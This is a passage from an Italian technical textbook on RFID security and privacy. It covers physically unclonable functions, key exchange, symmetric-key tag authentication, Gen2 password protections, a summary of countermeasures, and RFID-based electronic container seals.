ducibili in alcun modo. È proprio la non accessibilità, unita alla casualitàe non riproducibilità della funzione a generare la sicurezza.Appena “nato” il PUF si deve “registrare” fornendo una serie di rispo-

ste a domande. Queste verranno usate nel seguito per le autenticazioni.Naturalmente possibile è effettuare in qualunque momento un numeroillimitato di “registrazioni” tutte diverse tra loro e tutte usabili.La conoscenza di un sottoinsieme di risposte ad un determinato set di

interrogazioni consente al Reader di autenticare il TAG; una volta autentica-ti si può predisporre un “canale sicuro” di comunicazione, tramite il “segre-to condiviso” che entrambi conoscono senza bisogno di scambiarselo.Si noti che i set domande/risposte è infinito e può essere diverso per

ogni autenticazione.Esempi di PUF possono essere:

– il drogaggio con atomi di boro nella giunzione di un semiconduttore– un sistema ottico tridimensionale che produce scatter luminoso a causadi impurità a distribuzione casuale. Dati, in ingresso, gli angoli di inci-denza di un raggio laser la funzione in uscita sono gli scatter.

– La copertura di un circuito integrato con una dispersione casuale diparticelle di dielettrico, con elementi che misurano la capacità in diffe-renti posizioni.Sulla realizzabilità dei PUF nei TAG RFID e sul loro costo, è comun-

que prematuro pronunciarsi ed il tempo dirà se si tratta di una tecnicaapplicabile, almeno per le applicazioni più impegnative sul piano dellasicurezza.

5.2.4 Una proposta per lo scambio di chiavi

Sempre a proposito dell’allestimento di un canale sicuro, si vuole citareuna proposta originale per lo scambio di chiavi di cifratura apparsa direcente in letteratura [9].Il meccanismo di scambio di chiavi è stato proposto per gli NFC, anche

se non è contemplato nello standard ISO sugli NFC medesimi. Viene quicitato come possibile proposta tecnica, in modo generale in quanto inte-ressante ed applicabile, con le limitazioni che si vedranno, anche ai TAGattivi e passivi RFID con piccoli interventi su questi e modifiche più cor-pose ai Reader.

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID383

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 383

Page 369: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Il meccanismo di scambio di chiavi specifiche che viene descritto nonrichiede le risorse per una crittografia asimmetrica e può essere implementa-to disponendo di modeste capacità di calcolo, ottenendo un’alta sicurezza.Il sistema lavora solo con modulazione ASK ed indice di modulazione

al 100% (cfr.§ parte IV di questo libro).L’idea è che entrambi gli apparati che comunicano (A e B) inviino con-

temporaneamente dati casuali. Nella fase di setup i due apparati sincro-nizzano ampiezza e fase dei segnali RF e l’esatta temporizzazione dei bit.Dopo la sincronizzazione i due apparati possono inviare dati esattamenteallo stesso istante e con la medesima ampiezza e fase.Per realizzare la sincronizzazione è necessario che almeno uno degli

apparati sia attivo. Mentre vengono inviati bit casuali 1 e 0, almeno unodegli apparati (quello che sincronizza) deve anche ascoltare l’emissione RF.Una volta completata la sincronizzazione, quando entrambi gli appara-

ti inviano uno 0, la somma dei segnali è 0 e un eventuale aggressore inascolto non può capire che entrambi gli apparati mandano uno 0.Quando entrambi gli apparati inviano un 1, la somma è un segnale conintensità RF doppia e l’aggressore potrebbe dedurre che entrambi gliapparati hanno inviato un 1.Il caso interessante, però, è quando gli apparati inviano simboli discor-

danti. In questo caso ciascun apparato può capire cosa ha inviato l’altroin quanto conosce ciò che lui ha inviato.Per parte sua, un ascoltatore esterno può solo ricevere la somma dei

segnali e non può capire quale dei due apparati ha inviato che cosa.La situazione è illustrata in Figura VIII.13, il grafico superiore illustra

i segnali prodotti da A (in rosso) e da B (in blu).A invia quattro bits: 0, 0, 1, ed 1. B a sua volta invia quattro altri quat-

tro bits: 0, 1, 0, ed 1.Il grafico inferiore illustra la somma dei segnali, come dovrebbe essere

vista dall’aggressore. Viene evidenziato come per due combinazioni: Amanda 0, B manda 1 ed A manda 1, B manda 0, il risultato è lo stesso,visto dall’aggressore che quindi non può distinguerle.Per comunicare tra loro, i due apparati ora scartano tutti i bit in cui

entrambi gli apparati inviano lo stesso valore e tengono invece in conside-razione tutti i bit in cui entrambi gli apparati inviano valori differenti.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva384

Figura VIII.13Meccanismo senza crittografia per la

generazione e condivisione di una chiavesegreta.

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 384

Page 370: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Sapendo cosa essi hanno trasmesso possono capire cosa ha trasmesso l’al-tro apparato.In questo modo A e B possono comunicare e concordare un segreto

condiviso di lunghezza arbitraria.Un nuovo bit utile (non scartato) viene generato con probabilità del

50%, di conseguenza la generazione, ad esempio, di 128 bit richiede iltrasferimento (in media) di 256 bit. Alla velocità di 106 kbit/s (negli NFC)questo richiede circa 2,4 ms, tempo abbastanza breve per la maggior partedelle applicazioni.In pratica la sicurezza del protocollo dipende dalla qualità della sincro-

nizzazione raggiunta tra i due apparati.I dati devono coincidere in ampiezza e fase. Se le differenze tra i segna-

li di A e di B si mantengono significativamente al di sotto del livello delrumore ricevuto dall’aggressore che cerca di intercettare, il protocollopermane sicuro.Il livello di sicurezza dipende anche dalla qualità del segnale al ricevi-

tore dell’aggressore, la quale, a sua volta, dipende da diversi parametri (adesempio la distanza tra gli apparati trasmettitore ed intercettatore).In pratica i due apparati A e B devono realizzare una perfetta sincro-

nizzazione. Se un’intercettazione riuscisse a distinguere tra i dati inviati daA o da B la sicurezza sarebbe compromessa.

5.2.5 TAG a Chiave Simmetrica

Questo tipo di TAG possiede capacità elaborativa sufficiente a produrrefunzioni di crittografia simmetrica.In particolare i TAG sono dotati di una funzione che genera una ver-

sione crifrata di un testo in chiaro (cipher text).Il testo crifrato si genera combinando una chiave segreta (secret key) con

il testo in chiaro (plain text). Per le proprietà della funzione di crifratura l’u-nico modo per risalire al testo in chiaro è possedere la chiave segreta.La gestione del sistema è generalmente centralizzata, nel senso che il

Sistema di Gestione possiede le chiavi segrete di tutti i TAG e le distribui-sce, quando necessario, ai Reader.La procedura prevede che:

1. Il TAG invii al Reader il suo identificativo in chiaro.

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID385

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 385

Page 371: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

2. Il Reader invii, in chiaro, al TAG una stringa pseudocasuale (il “chal-lenge”) generata per l’occasione.

3. Il TAG generi un messaggio cifrando con la sua chiave segreta il codi-ce pseudocasuale che il Reader gli ha inviato. Quindi invii il messaggiocifrato al Reader

4. Il Reader, infine, verifichi l’identità del TAG decrifrando il messaggioattraverso la chiave segreta che otterrà dal Sistema di Gestione a partiredall’identificativo che il TAG ha precedentemente trasmesso in chiaro.

5. A questo punto la procedura è completa, l’identità del TAG è certa e sipuò passare all’eventuale allestimento del “canale sicuro”Il sistema dovrebbe risolvere i problemi di autenticazione, scongiuran-

do ogni pericolo di clonazione del TAG. Infatti, non venendo mai tra-smessa la chiave segreta, l'unico modo per rompere la sicurezza sarebbequello di effettuare attacchi fisici al TAG o al Sistema di Gestione.Quest'ultima affermazione risulta vera sempre che lo spazio delle chiavi(la cardinalità delle possibili chiavi segrete) sia sufficiente per resistere adattacchi “bruteforce”.Questo costituisce anche un limite del sistema dovendo le chiavi segre-

te di ogni TAG (miliardi di chiavi differenti) essere note a tutti i sistemi digestione nella catena di distribuzione oppure circolare in rete. In entram-bi i casi non essendo chiaro da chi debbano essere gestite.

CRIPTAZIONE DEI DATI – ALLESTIMENTO DI UN “CANALE SICURO”La cifratura dei dati è la misura principale per proteggere la trasmissioneda attacchi esterni ed avviene generalmente dopo la conclusione dellaprocedura di autenticazione.I dati non protetti, infatti, possono essere intercettati o modificati.

Spesso la cifratura viene effettuata con le chiavi oggetto della precedenteprocedura di autenticazione.La differenza fondamentale tra il canale sicuro e la semplice applicazio-

ne di una funzione hash (anche con firma elettronica) ai dati del TAG,consiste nel fatto che, nel canale sicuro viene effettuato, volta per volta,uno scambio di chiavi e la cifratura dei dati si opera on line.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva386

VIII.5.3

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 386

Page 372: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Prima della trasmissione i dati sono cifrati usando la chiave segreta K;il ricevitore successivamente decifra i dati cifrati usando la chiave K’. Sele chiavi K e K’ sono identiche (o in relazione reciproca) l’algoritmo sidice simmetrico, altrimenti la procedura è definita asimmetrica.Se ciascun carattere, dei dati trasmessi, viene cifrato individualmente,

la tecnica viene denominata “stream ciphering”, se i caratteri vengonoripartiti in blocchi e questi vengono criptati, la tecnica viene denominata“block ciphering”.Nell’ambito delle tecniche asimmetriche rientrano i cosiddetti algorit-

mi di cifratura a chiave pubblica/privata nei quali solo una delle due chia-vi è segreta. Tali algoritmi sono anche alla base dell’autenticazionemediante firma elettronica. Algoritmi di autenticazione del tipo “challan-ge response” descritti nel paragrafo precedente possono essere definitianche utilizzando chiavi asimmetriche.Gli algoritmi a chiave pubblica applicati on line nell’autenticazione,

tuttavia, richiedono operazioni aritmetiche complesse e conseguentemen-te onerose in termini di circuiteria dedicata. Per tale motivo il loro impie-go nell’ambito dei sistemi RFID è attualmente previsto solamente nellecarte senza contatto mentre per TAG di etichette a basso costo non è perora implemetato.Data Encryption Standard (DES), triple DES, e Advanced Encryption

Standard (AES) sono esempi di algoritmi simmetrici.RSA, Elliptical Curve Cryptography (ECC), Diffie-Hellman key mana-

gement protocol, e Digital Signature Algorithm (DSA, utilizzato solo perla firma elettronica) sono esempi di algoritmi asimmetrici.Stabilire un canale sicuro è certamente la migliore procedura per pro-

teggere i dati delle intercettazioni da ogni genere di alterazioni dei dati oinserimento di falsi messaggi.A tale scopo un sistema asimmetrico vanta un meccanismo di scambio

di chiavi facilitato ma l’algoritmo di cifratura è più complesso e quindi piùlento rispetto a un sistema simmetrico; utilizzarlo direttamente per lacifratura dei dati non è quindi la scelta ottimale.Può essere stabilito un protocollo standard per la validazione di un

segreto condiviso tra due apparati; un esempio è il noto Diffie-Hellmann

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID387

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 387

Page 373: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

basato su RSA o su curve ellitiche.L'utilizzo di tecniche di cifratura asimmetriche può essere usato per deri-

vare delle chiavi simmetriche da utilizzare in algoritmi quali 3DES o AES,che possono essere usati per stabilire un canale di comunicazione sicuro. Inletteratura possono essere reperite varie modalità per 3DES o AES.Un tale approccio consiste nell’uso di un sistema asimmetrico per ope-

rare uno scambio cifrato di chiavi che sono successivamente utilizzate daun sistema simmetrico per cifrare i dati. In tale approccio quindi la tecni-ca Diffie-Hellmann non è utilizzata come algoritmo di cifratura ma piut-tosto come tecnica per lo scambio sicuro di chiavi segrete.

SICUREZZA NEI TAG GEN2La cifratura dei dati è la misura principale per proteggere la trasmissioneda attacchi esterni ed avviene generalmente dopo la conclusione dellaprocedura di autenticazione.Nell’ultima generazione di TAG passivi UHF (i cosiddetti Gen2) sono

state introdotte delle effettive misure di sicurezza. Essenzialmente abilita-zioni/disabilitazioni basate su password a causa della penuria di capacitàdi calcolo disponibile. Si tratta essenzialmente di tre funzioni:− Killing:Possibilita di disabilitare definitivamente i TAG in modo tale che i lorodati non possano più essere accessibili. La disabilitazione avviene subase password.

− Cloaking:Consente di configurare i TAG in modo tale che prima di rispondere aqualunque interrogazione necessitano di ricevere una password dalReader.

− Access:Altre password possono essere implementate per consente di scriveresezioni di memoria dei TAG.

Inoltre, per fornire una protezione contro le intercettazioni, nei sistemi

RFID - Fondamenti di una tecnologia silenziosamente pervasiva388

VIII.5.4

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 388

Page 374: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

con TAG Gen2, si creano le condizioni affinché il Reader non inseriscadati sensibili in trasmissione. Le protezioni si basano su un codice pseu-docasuale a 16 bit (RN16) prodotto dal TAG ed adibito a vari usi. Leprocedure di sicurezza riguardano:• EPC ricevuto dal TAG.Durante la procedura di identificazione, TAG e Reader usano unopseudonimo generato casualmente (RN16 con funzione di “TAG’shandle“) per dichiarare la propria identità. Solo ad identificazioneavvenuta, il TAG trasmette il proprio EPC, corredato da un codice dirilevazione di errore (Error Checking Code) per assicurare l’integritàdei dati trasmessi.

• Password per Killing, Cloaking e scrittura nella memoria del TAG:le password non sono trasmesse in chiaro dal Reader, ma cifrate con uncodice casuale (RN16 con funzione di “cover code”) creato dal TAG etrasmesso al Reader.In definitiva le informazioni trasmesse ad alta potenza (dal Reader)

vengono cifrate, mentre le informazioni sensibili (incluse le chiavi di cifra-tura) vengono trasmesse solo in backscatter (con potenze minime) dalTAG al Reader, rendendo difficile l’intercettazione.È allo studio l’introduzione, in future generazioni di TAG (classe 2) di

algoritmi di autenticazione e crittografia (probabilmente simmetrica perla modesta capacità di calcolo richiesta) simili a quelli usati nelle cartesenza contatto (che, come detto in precedenza, sono a tutti gli effettiRFID, anche se adibiti ad uso diverso dalle “etichette intelligenti”).

SOMMARIO DELLE CONTROMISUREPer concludere si ritiene utile riassumere, in estrema sintesi, le contromisu-re agli attacchi che sono state discusse in dettaglio nei paragrafi precedenti:Regole tecniche sulla costruzione delle etichette:

1. La lettura/scrittura dei TAG deve essere protetta2. I TAG non devono operare fuori della catena di distribuzionePer il primo punto la soluzione consiste nell’uso di pseudonimi, pas-

sword, tecniche crittografiche, ovvero:

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID389

VIII.6

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 389

Page 375: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

• Cloaking:password per rispondere e/o scrivere sezioni di memoria

• Uso di pseudonimi• Cifratura dei dati in memoria (funzioni hash e firma digitale a caricodel reader)

• Autenticazione “forte” (in futuro)• Allestimento di un “Canale sicuro” (in futuro)Per il secondo punto occorre ricordare che sia la disabilitazione del

TAG, sia l’eliminazione fisica dell’antenna sono soluzioni semplici e veri-ficabili che generano fiducia nel consumatore.

Regole di comportamento per i progettisti di sistemi RFID:• Rinnovo di password e chiavi nei diversi segmenti della catena di dis-tribuzione (contestualizzazione)

• Spostare le misure di sicurezza dagli RFID alle basi di dati (blocco dellacorrelazione)

• Precauzioni generali:- limitazione dei dati memorizzati nel TAG, ovvero solo il puntatorealle informazioni contenute in una base di dati:- opportunamente protetta;- contestualizzata nei segmenti della catena di distribuzione.

- distruggere l’associazione con altre informazioni dai sistemi di backend non appena esse divengono inutili.

Regole di comportamento per i consumatoril’identificazione e la schermatura del TAG sono le prime precauzioni

contro le letture indesiderate:• Killing:disabilitazione totale; dati non più accessibili.

• Clipping:disabilitazione parziale; dati accessibili solo in prossimità

• Altre soluzioni banali (ma efficaci)- Posizionare il TAG sulla confezione anziché all’interno dell’oggetto;- Segnalare la presenza di TAG sulle merci;- Collocare i TAG in modo che possano essere fisicamente eliminati.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva390

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 390

Page 376: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

eSEAL - SIGILLI ELETTRONICI

ATTACCHI ALLA SICUREZZA DELLA SUPPLY CHAIN

Lo studio della struttura della supply chain, ovvero il flusso di dati e dibeni materiali attraverso i diversi possibili stadi del trasporto che, parten-do dal fornitore (supplier), terminano con un’eventuale distribuzione intutto il mondo, va posto come punto di partenza per la discussione sullasicurezza nel trasporto merci.A questo proposito possono essere identificate diverse criticità nei dif-

ferenti componenti della catena. Per quanto concerne i threat ai sistemiRFID, si è già detto nei precedenti paragrafi di questa parte dedicata allasicurezza.Nel seguito si tratterà di un aspetto particolare, che sta acquistando

rilevanza crescente e sta coinvolgendo significativamente la tecnologiaRFID; si tratta degli attacchi alla sicurezza fisica dei container. In partico-lare si riscontrano due principali tipi di attacco, entrambi finalizzati allamanomissione fisica del container:– Attacchi interni (Insider Attack):sono dovuti prevalemtemente a personale interno al sistema che hadiretto accesso ai beni ed ai realtivi dati durante il flusso della catena.Rilevare questo tipo di effrazioni risulta, quindi, particolarmente diffi-cile e specifiche contromisure devono essere adottate per evitarlo. Adesempio, l’utilizzo mirato di tecnologie che permettano di monitorarelo stato del sistema e segnalare l’avvenuto attacco, rappresenta unmodo possibile per risolvere questo problema.

– Attacchi esterni:avvengono generalmente durante la fase del trasporto delle merci,quindi lontano da possibili controlli da parte del personale predispo-sto. Il primo passo per limitare questa vulnerabilità del sistema consi-ste nel sigillare le porte del container con un sigillo meccanico.Tuttavia, la possibilità da parte dell'attaccante di operare lontano daicontrolli e di sostituire il sigillo violato con uno falso, in modo danascondere l'attacco, rende questa contromisura spesso inadeguata.Nei paragrafi che seguono vengono descritte alcune possibili contromi-

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID391

VIII.7

VIII.7.1

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 391

Page 377: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

sure agli attacchi, che consistono essenzialmente della sigillatura del con-tainer con metodi sicuri. Si prenderanno le mosse dalla definizione di basedel sigillo e delle sue caratteristiche fondamentali, per descrivere poi alcu-ni casi concreti.Infine si rileverà come, per contrastare entrabi gli attacchi, sorga l’esi-

genza di utilizzare sistemi di sigillatura e controllo più evoluti che preve-dano la possibilità di essere interrogati sul loro stato in qualsiasi fase inter-media del trasporto e che siano difficilmente clonabili.

INTRODUZIONE AI SIGILLI ELETTRONICI

La crescente richiesta di sicurezza sistemi di trasporto ha portato laCommissione Europea a costituire gruppi di lavoro e ad avviare progettipilota per affrontare il problema.In particolare, per quanto riguarda la catena del trasporto merci

(supply chain), uno degli anelli deboli dal punto di vista della sicurezza èrappresentato dal flusso di container. Questi ultimi, infatti, sono tuttoracostruiti secondo progetti concepiti in epoca in cui la sicurezza non eraconsiderata con l’attenzione che oggi le si dedica. Mettere in sicurezza uncontainer commerciale significa quindi agire su una struttura non pensa-ta per essere sicura; lo spazio d’azione si limita all’aggiunta di sistemi disigillatura delle porte di accesso e sistemi “intelligenti” a bordo (smartbox) che sorvegliano il volume interno del container e inviano un messag-gio di allarme alle stazioni di controllo remote in caso di apertura nonautorizzata.Il Centro Congiunto di Ricerca (JRC), nella sua veste istituzionale di

consulente scientifico della Commissione, ha individuato nella tecnologiaRFID le potenzialità per sviluppare sistemi di sigillatura che soddisfino irequisiti di maggiore sicurezza e che al contempo non siano fuori dallelogiche di mercato dal punto di vista del prezzo. L’obiettivo consiste nelfar accettare al mercato questi nuovi sistemi senza la necessità di imporliper via legislativa.Per fare ciò occorrono prodotti che uniscano alla maggiore sicurezza

un incremento contenuto dei costi, in modo che il sistema sia sostenibile

RFID - Fondamenti di una tecnologia silenziosamente pervasiva392

VIII.7.2

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 392

Page 378: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

per gli operatori coinvolti. Inoltre l’incremento della sicurezza e dell’au-tomazione nelle ispezioni potrebbe portare a una diminuzione dei costiassicurativi e ad un risparmio di tempo e denaro dovuto ai miglioramentinella logistica.Nel seguito si presenteranno le soluzioni tecnologiche proposte per il

problema della sicurezza nella supply chain dal gruppo di ricerca SILab(Seals and Identificatiton Laboratory). SILab è parte dell’IPSC (Institutefor the Protection and Security of the Citizen), uno dei sette istituti delCentro Congiunto di Ricerca (Joint Research Centre) della CommissioneEuropea.SILab opera nel campo della sigillatura da quasi venti anni. L’attività è

iniziata nel campo della sigillatura di contenitori di materiale radioattivoutilizzato e prodotto nelle centrali nucleari ed in seguito è stata ampliataalla sigillatura di container commerciali.Il SILab, a rappresentanza del JRC, partecipa a diversi progetti pilota

e gruppi di lavoro con la funzione di dare consulenza tecnica e scientificanella stesura di direttive europee che regolamentano ed armonizzano l’usodella tecnologia RFID nei 27 Stati membri dell’Unione, con particolareattenzione al tema della sicurezza nei trasporti.

7.2.1 Funzioni di un sigillo

Le funzioni principali di un sigillo sono due:– Integrità;rendere evidente l’avvenuta apertura del contenitore su cui è applicato.

– Identità;fornire in modo univoco la propria identità.In alcuni casi il sigillo possiede anche altre funzionalità, come ad esem-

pio una certa robustezza meccanica che renda oggettivamente difficolto-sa la sua rimozione, ma, secondo la definizione più rigorosa, un sigillo peressere tale deve possedere le due funzionalità sopraccitate.Le caratteristiche che stabiliscono la qualità di un sigillo sono:

– Non duplicabilità;il tipo più semplice di attacco ad un sigillo consiste nel distruggerlo erimpiazzarlo con uno identico; un buon sigillo non deve essere facil-

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID393

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 393

Page 379: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

mente duplicabile.– Affidabilità;una volta aperto, il sigillo non deve poter essere richiuso oppure deverivelare in modo evidente il fatto di essere stato aperto.

– Verificabilità;un sigillo deve rendere più facile possibile la sua verifica da parte di unoperatore, sia ad occhio nudo che tramite l’uso di dispositivi dedicati.Nel campo dei container commerciali i sigilli sono impiegati come con-

trollo del fatto che il container, in un dato tragitto, non abbia subito aper-ture; il sigillo è dunque anche un modo per ripartire la responsabilità trale entità coinvolte nella sua gestione durante tutto il tragitto.

7.2.2 Le norme ISO sui sigilli

La norma ISO 18185-1/2/3/4/5 del 2007 prende in considerazione l’uti-lizzo di sigilli diversi a partire da quelli puramente meccanici e regolamen-ta i sigilli elettronici. Discussioni su questa normativa sono ancora aperte.

TECNOLOGIE PER I SIGILLI

Attualmente sul mercato sono disponibili diversi tipi di sigillo: si va dallasemplice fascetta di plastica o cavo intrecciato non rimovibile, dotati di logoo simbolo dell’ente proprietario ma non dotati di un numero seriale che liidentifichi univocamente, ai sigilli metallici più complessi, fino ad arrivareai tipi più sofisticati di sigilli elettronici passivi e attivi. Tutti questi sigillirientrano nella categoria dei TID (Tamper Indicating Devices), ossia sonodispositivi che conservano una traccia non facilmente cancellabile di even-tuali manomissioni, o tentativi di manomissione, che dovessero subire.I sigilli si possono grossomodo dividere in tre grandi categorie:

- Sigilli meccanici.- Sigilli elettronici - eSeal- passivi- attivi.

Sigilli meccanici: la stragrande maggioranza dei sigilli correntemente usati

RFID - Fondamenti di una tecnologia silenziosamente pervasiva394

VIII.7.3

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 394

Page 380: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

per la messa in sicurezza dei container commerciali sono di tipo meccani-co. Esistono tipi di sigilli meccanici molto diversi tra loro ma tutti presen-tano alcune caratteristiche che li accomunano:– necessitano di una ispezione visiva da parte di un operatore per stabi-lire la loro integrità;

– il livello di sicurezza che offrono è basato principalmente sulla altera-zione del loro aspetto esteriore in conseguenza di un tentativo dimanomissione, ad esempio presentando deformazioni non facilmenteoccultabili;

– non sono in grado di fornire alcuna informazione circa il momento edil luogo in cui è avvenuta la manomissione;

– non possono eseguire un self-assessment del proprio stato, ossia nonhanno la capacità di auto-verificare la propria integrità.Questa categoria di sigilli ha un costo mediamente più basso rispetto ai

sigilli elettronici e normalmente è facile da installare e rimuovere.Uno dei principali punti deboli di questo tipo di sigilli è rappresentato

dal “fattore umano”; il livello di sicurezza che garantiscono, infatti, dipen-de fortemente dall’esperienza e dall’abilità della persona incaricata allaloro ispezione. Un ispettore inesperto potrebbe non accorgersi di un’av-venuta manomissione che un ispettore più esperto individuerebbe senzaproblemi. Questo è uno dei fattori che spinge lil mondo della ricercaverso dispositivi che siano in grado di “dichiarare” il proprio stato conmeno ambiguità, ossia che abbiano la capacità di eseguire il self-asses-sment citato precedentemente.

eSeal passivi: sono sigilli che abbinano alla parte meccanica uno o più dis-positivi elettronici passivi (non dotati di un’alimentazione propria), chedanno la possibilità di automatizzare in una certa misura le operazioni diverifica. Un esempio è rappresentato dai sigilli che si basano sulla tecno-logia RFID passiva, dove il dispositivo risponde ad una interrogazione diun Reader. Questo tipo di sigilli fanno un passo nella direzione di svinco-larsi dal fattore umano, in quanto forniscono strumenti di ispezione(Reader) che danno informazioni più precise, e dunque meno soggette adinterpretazioni, riguardo al loro stato.

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID395

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 395

Page 381: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

eSeal attivi: i sigilli attivi dispongono di una fonte di energia propria. Unesempio è rappresentato dai sigilli che si basano sulla tecnologia RFIDattiva, dove il dispositivo in radiofrequenza usato per generare il segnaledi risposta ad una interrogazione è alimentato da una batteria. Questorende possibile realizzare dispositivi con portate maggiori rispetto ai dis-positivi passivi. In molti casi non è neppure necessario che un TAG atti-vo sia fermo perché la sua lettura avvenga con successo.I tipi più sofisticati di sigilli attivi che si stanno affacciando sul merca-

to presentano anche la possibilità di registrare la propria posizione conl’ausilio di un ricevitore GPS integrato, o di comunicare in modo automa-tico il proprio stato attraverso l'uso delle reti di telefonia mobile.

7.3.1 Ruolo della tecnologia RFID

La tecnologia RFID si presta molto bene per applicazioni di sigillaturaelettronica: il suo basso costo, unito a dimensioni molto contenute ed unarelativa robustezza, fa sì che l’uso di dispositivi RFID passivi possa esseredi tipo “usa-e-getta”, dove l’integrità del dispositivo RFID costituisceprova dell’integrità del sigillo stesso, permettendo al contempo di sfrutta-re tutte le caratteristiche di lettura senza line of sight e salvataggio datiproprie di questo tipo di dispositivi.Un eSeal (sigillo elettronico) è quindi un sigillo contenente al suo inter-

no uno o più dispositivi elettronici (generalmente RFID). Questi disposi-tivi servono ad aumentare la sicurezza e la possibilità di controllo rispet-to ad un normale sigillo meccanico.Diversi sigilli elettronici basati sulla tecnologia RFID passiva e attiva

sono stati sviluppati da JRC.Gli eSeal passivi possono contenere un numero diverso di dispositivi

RFID, in conseguenza di un differente livello di sicurezza e funzionalità.– Un sigillo passivo a singolo TAG permette la verifica della propria inte-grità e, finché quest’ultima è presente, della propria identità.

– Un sigillo a doppio TAG offre entrambe queste informazioni, e inaggiunta permette di verificare la sua corretta installazione.

– Un sigillo multi-TAG permette, oltre alle informazioni di integrità,identità e corretta installazione, di salvare e rendere disponibili molte

RFID - Fondamenti di una tecnologia silenziosamente pervasiva396

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 396

Page 382: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

altre informazioni riguardanti la vita del sigillo stesso, rendendolointrinsecamente più sicuro.I sigilli attivi aggiungono al livello di sicurezza proprio degli eSeal pas-

sivi la possibilità di essere interrogati a distanza ed in movimento. Questorende più agevoli ed economiche le operazioni di verifica, ma al contem-po aggiunge il bisogno di una infrastruttura piú costosa per la loro gestio-ne, come verrà descritto in §VIII.7.7.

SIGILLO PASSIVO A SINGOLO TAG

In Figura VIII.14 si può vedere un esempio di sigillo a singolo TAG svi-luppato dal SILab. Si tratta di un lucchetto a cui è stato aggiunto un TAGRFID nella parte inferiore della feritoia di chiusura (visibile come uninserto scuro sul corpo in ottone del lucchetto). Il TAG risulta posto inmodo tale che l’apertura del lucchetto non sia possibile senza la distruzio-ne del TAG stesso. Questo fa sì che il lucchetto dotato di TAG abbia tuttii requisiti per essere definito sigillo: ad una ispezione con un Reader ade-guato è possibile verificare la sua integrità e la sua identità.Il TAG è leggibile in virtù dell'inserto scuro in plastica che si vede nella

figura, che a differenza del corpo metallico del lucchetto non funge daschermatura per le onde elettromagnetiche.Vale la pena notare che nel caso di configurazioni a singolo TAG l’iden-

tità è garantita solo fino a quando il TAG stesso è integro; se il TAG èdistrutto da un’apertura, sia legale che illegale, si perde anche l’informa-zione riguardante l’identità del sigillo.Nelle applicazioni reali questo è un falso problema in quanto risulta

chiaro che l’informazione relativa all’identità è funzionale alla verifica del-l’integrità; un sigillo che risulti non integro ha svolto il suo compito disegnalare una effrazione, e la sua identità a questo punto perde importan-za. L’identità è importante quando il sigillo è integro e si vuole verificareche non ci sia stata una sostituzione del sigillo originale con uno diverso.In Figura VIII.15 è illustrato un altro sigillo a singolo TAG sviluppato

dal SILab. Questo modello è stato progettato per contenitori di olio nelcampo automobilistico.

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID397

Figura VIII.14Sigillo/lucchetto a singolo TAG

Figura VIII.15Sigillo a singolo TAG per contenitori di olio

(uso automobilistico)

VIII.7.4

II-parteVIII.qxp:RFID 5-09-2008 11:02 Pagina 397

Page 383: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

SIGILLO PASSIVO A DOPPIO TAG

I sigilli a doppio TAG permettono la verifica della propria integrità edidentità analogamente alla versione a singolo TAG. L’aggiunta di unTAG permette di verificare che il sigillo sia stato installato (chiuso) cor-rettamente.Un tipo molto insidioso di attacco, infatti, consiste nella falsa installa-

zione di un sigillo. Lo scopo di questo tipo di attacco è di fare in modoche ad un’ispezione visiva il sigillo sembri installato correttamente, inmodo da poterlo poi rimuovere in un secondo tempo senza lasciare segnidi effrazione. Il sigillo è poi reinstallato correttamente rendendo impossi-bile verificare l’avvenuta effrazione. Questo attacco è utilizzato, ad esem-pio, per aprire un container durante il tragitto.Il sigillo a doppio TAG è un primo passo verso la difesa da un tipo di

attacco tra i più insidiosi e difficili da prevenire: il cosiddetto insiderattack. Il tipo di attacco sopra descritto, infatti, è effettuato da un opera-tore disonesto e non da una persona esterna all’organizzazione responsa-bile della sigillatura dei container.

Esistono due tipi di funzionamento per i sigilli a doppio TAG:– il primo tipo, più semplice, consiste nel utilizzare i due TAG comeprova fisica di apertura e chiusura. È progettato in modo tale che ilsigillo vergine non possa essere chiuso senza distruggere il TAG dichiusura e successivamente non possa essere aperto senza distruggereil TAG di integrità.

